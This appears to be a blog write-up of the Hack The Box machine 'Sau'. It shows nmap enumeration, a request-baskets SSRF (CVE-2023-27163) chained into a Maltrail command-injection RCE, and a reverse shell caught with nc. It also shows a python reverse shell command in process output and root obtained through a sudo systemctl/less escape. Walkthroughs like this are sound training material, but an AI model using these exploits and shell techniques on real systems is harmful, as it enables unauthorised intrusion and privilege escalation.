CyberCherney

About Tags

Summary

The challenge of this box comes from searching of esoteric service versions and a small understanding of some Linux commands. There is a cool use of SSRF which uses a previous exploit to exploit a locally hosted service.

Enumeration

nmap

┌─[raccoon@cyberraccoon-virtualbox]─[~/_hacking/HackTheBox/Active/Sau]
└──╼ $nmap -sC 10.10.11.224
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-27 21:03 CDT
Nmap scan report for 10.10.11.224
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown

Normally when I use common scripts with the -sC option it will return results from port 80 and 443 about the webpage. Here there is evidently no information being retrieved from whatever is hosted on port 80.

That port 55555 is peculiar however, so I’ll try to enumerate its version and go from there.

55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 28 Aug 2023 02:11:02 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Mon, 28 Aug 2023 02:10:35 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Mon, 28 Aug 2023 02:10:36 GMT
|_    Content-Length: 0

The page /web returns a 200 response which means there is a webserver being hosted on this port.

Port 55555 Webpage

User as puma

request-baskets 1.2.1 SSRF

Looking around the webpage we can see the version of the service is request-baskets version 1.2.1, and in the cursory look for vulnerabilities I found this SSRF exploit for version 1.2.1. This should allow me to interact with and enumerate the service on port 80.

That CVE works through an improperly secured forwarded_url and proxy_response parameter pair which allow server side redirection of traffic and functionally a proxy to relay it back.

┌─[raccoon@cyberraccoon-virtualbox]─[~/_hacking/HackTheBox/Active/Sau]
└──╼ $bash CVE-2023-27163.sh http://10.10.11.224:55555 http://localhost:80/
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "uibqua" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/uibqua now makes the server request to http://localhost:80/.
> Authorization: qfG-kBDhxT7X3j1NKwRqKLpSS2uj5K5_1S455l0TttzC

SSRF to port 80 localhost

maltrail v0.53 RCE

Seems to have loaded a bit poorly but the substance is still visible. Namely there is a login button that does not properly work, though I can redirect to http://localhost:80/login and check for a response.

Which we end up not seeing a login page but a response stating a bad request. Here is an exploit-db post which outlines an RCE on this version of maltrails through command injection of the username parameter.

┌─[raccoon@cyberraccoon-virtualbox]─[~/_hacking/HackTheBox/Active/Sau]
└──╼ $python3 cve* 10.10.14.3 7777 http://10.10.11.224:55555/undrtk
Running exploit on http://10.10.11.224:55555/undrtk/login
Failed to forward request: Post http://localhost:80/login/login: EOF

Oh it looks like the maltrails exploit already appends /login to the url, guess I’ll comment that out since I already have a basket with /login.

The code I changed:

listening_IP = sys.argv[1]
listening_PORT = sys.argv[2]
target_URL = sys.argv[3] # + "/login"
print("Running exploit on " + str(target_URL))
curl_cmd(listening_IP, listening_PORT, target_URL)

┌─[raccoon@cyberraccoon-virtualbox]─[~/_hacking/HackTheBox/Active/Sau]
└──╼ $python3 cve* 10.10.14.3 7777 http://10.10.11.224:55555/undrtk
Running exploit on http://10.10.11.224:55555/undrtk/login


┌─[raccoon@cyberraccoon-virtualbox]─[~/_hacking/HackTheBox/Active/Sau]
└──╼ $nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.224] 51746
$ whoami
whoami
puma
$ cd ~
cd ~
$ cat user.txt
cat user.txt
3af9547e0181e-------------------

Root

GTFOBins Less

After placing an ssh key for a better shell I turned to sudo -l as my first check. And the user puma has the ability to run systemctl status as sudo. Now systemctl itself with these restrictions prohibits us from creating or running a custom service.

There is a quirk here to abuse, and that is that systemctl status utilizes the command less to display the results. When less is run you can gain or change shells within by typing !/bin/bash, and while sudo that will give us a root shell.

puma@sau:~$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$ sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Sun 2023-08-27 16:39:15 UTC; 10h ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 895 (python3)
      Tasks: 7 (limit: 4662)
     Memory: 21.3M
     CGroup: /system.slice/trail.service
             ├─ 895 /usr/bin/python3 server.py
             ├─1543 /bin/sh -c logger -p auth.info -t "maltrail[895]" "Failed password for ;`echo "cHl0aG9uMyAtYy>
             ├─1544 /bin/sh -c logger -p auth.info -t "maltrail[895]" "Failed password for ;`echo "cHl0aG9uMyAtYy>
             ├─1547 sh
             ├─1548 python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(>
             └─1549 /bin/sh

Aug 27 16:39:15 sau systemd[1]: Started Maltrail. Server of malicious traffic detection system.
!/bin/bash
root@sau:/home/puma# cat ~/root.txt
8471e26dc2e185------------------